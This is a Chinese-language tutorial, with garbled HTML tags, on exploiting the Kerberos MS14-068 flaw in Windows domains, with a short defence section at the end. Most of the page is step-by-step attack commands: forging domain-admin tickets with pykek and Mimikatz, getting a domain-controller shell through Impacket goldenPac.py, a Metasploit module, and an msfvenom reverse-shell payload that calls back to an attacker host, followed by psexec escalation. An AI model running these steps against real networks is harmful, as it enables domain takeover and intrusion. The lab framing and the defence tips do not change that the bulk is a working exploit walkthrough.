Kerberos-MS14-068漏洞利用与防御教学文档<\/h1>

漏洞概述<\/h2>

MS14-068 (CVE-2014-6324)是微软于2014年11月18日发布的紧急补丁修复的Kerberos KDC漏洞，影响Windows全版本服务器系统：<\/p>

Windows Server 2003<\/li>
Windows Server 2008<\/li>
Windows Server 2008 R2<\/li>
Windows Server 2012<\/li>

Windows Server 2012 R2<\/li> <\/ul>

漏洞原理<\/strong>：攻击者可以伪造Kerberos Ticket声明自己是域管理员，而KDC在处理该Ticket时未正确验证签名，导致普通域用户可提升至域管理员权限。<\/p>

漏洞利用前提条件<\/h2>

获取域内任意一台计算机的shell权限<\/li>
知道任意一个域用户的：

用户名<\/li>
SID<\/li>
密码<\/li> <\/ul> <\/li> <\/ol>
利用方法<\/h2>
方法一：Pykek + Mimikatz<\/h3>
工具准备<\/strong>：<\/p>

Pykek (Python Kerberos Exploitation Kit)：https:\/\/github.com\/mubix\/pykek<\/li>
Mimikatz<\/li> <\/ul>
利用步骤<\/strong>：<\/p>

检查补丁情况<\/strong>：<\/p>
wmic qfe get hotfixid <\/span><\/span><\/code><\/pre>确认不存在KB3011780补丁<\/p> <\/li> 获取用户SID<\/strong>：<\/p> whoami \/user <\/span><\/span><\/code><\/pre>或查看所有用户SID：<\/p> wmic useraccount get name,sid <\/span><\/span><\/code><\/pre><\/li> 生成高权限票据<\/strong>：<\/p> python ms14-068.py -u user@pentest.com -s S-1-5-21-3112629480-1751665795-4053538595-1104 -d 172.16.86.130 -p Aa123456@ <\/span><\/span><\/code><\/pre>生成TGT_user1@pentest.com.ccache文件<\/p> <\/li> 使用Mimikatz注入票据<\/strong>：<\/p> 清除现有票据： kerberos::purge <\/code><\/pre> <\/li> 注入新票据： kerberos::ptc "TGT_user1@pentest.com.ccache" <\/code><\/pre> <\/li> <\/ul> <\/li> 验证权限<\/strong>：<\/p> dir<\/span> \\WIN-2K5J2NT2O7P\c$ <\/span><\/span><\/code><\/pre><\/li> <\/ol> 方法二：Impacket的goldenPac.py<\/h3> 工具准备<\/strong>：<\/p> Impacket工具包<\/li> 安装Kerberos客户端： apt-get install krb5-user -y <\/span><\/span><\/code><\/pre><\/li> <\/ul> 利用步骤<\/strong>：<\/p> python goldenPac.py pentest.com\/user1:jackpwd@dc.pentest.com <\/span><\/span><\/code><\/pre>可直接获取域控制器的cmd shell<\/p> 方法三：Metasploit框架<\/h3> 利用步骤<\/strong>：<\/p> 使用MS14-068模块：<\/p> use auxiliary\/admin\/kerberos\/ms14_068_kerberos_checksum set DOMAIN pentest.com set PASSWORD Aa123456@ set USER user1 set USER_SID S-1-5-21-3112629480-1751665795-4053538595-1104 exploit <\/code><\/pre> 生成bin格式票据文件<\/p> <\/li> 使用Mimikatz转换格式：<\/p> kerberos::clist "20180715230259_default_172.16.86.130_windows.kerberos_839172.bin" \/export <\/code><\/pre> 生成kirbi格式票据<\/p> <\/li> 生成并上传木马：<\/p> msfvenom -p windows\/meterpreter\/reverse_tcp LHOST=<\/span>172.16.86.135 LPORT=<\/span>4444<\/span> -f exe > shell.exe <\/span><\/span><\/code><\/pre><\/li> 建立监听并执行木马<\/p> <\/li> 导入票据并提权：<\/p> load kiwi kerberos_ticket_use \/tmp\/0-00000000-user1@krbtgt-PENTEST.COM.kirbi background <\/code><\/pre> 然后使用psexec模块提权<\/p> <\/li> <\/ol> 防御方案<\/h2> 补丁管理<\/strong>：<\/p> 开启Windows Update自动更新<\/li> 手动安装MS14-068补丁(KB3011780)<\/li> <\/ul> <\/li> 账户安全<\/strong>：<\/p> 禁用域内账户弱口令<\/li> 定期修改密码<\/li> 实施强密码策略<\/li> <\/ul> <\/li> 安全防护<\/strong>：<\/p> 在服务器端安装反病毒软件并保持更新<\/li> 监控异常Kerberos票据请求<\/li> <\/ul> <\/li> 日志监控<\/strong>：<\/p> 监控异常权限提升行为<\/li> 特别关注psexec等工具的异常使用<\/li> <\/ul> <\/li> <\/ol> 测试环境参考<\/h2> 域：pentest.com<\/li> 域账号：user1\/Aa123456@<\/li> 域SID：S-1-5-21-3112629480-1751665795-4053538595-1104<\/li> 域控：WIN-2K5J2NT2O7P.pentest.com<\/li> 攻击机(Kali)：172.16.86.131<\/li> 域机器：172.16.86.129<\/li> <\/ul>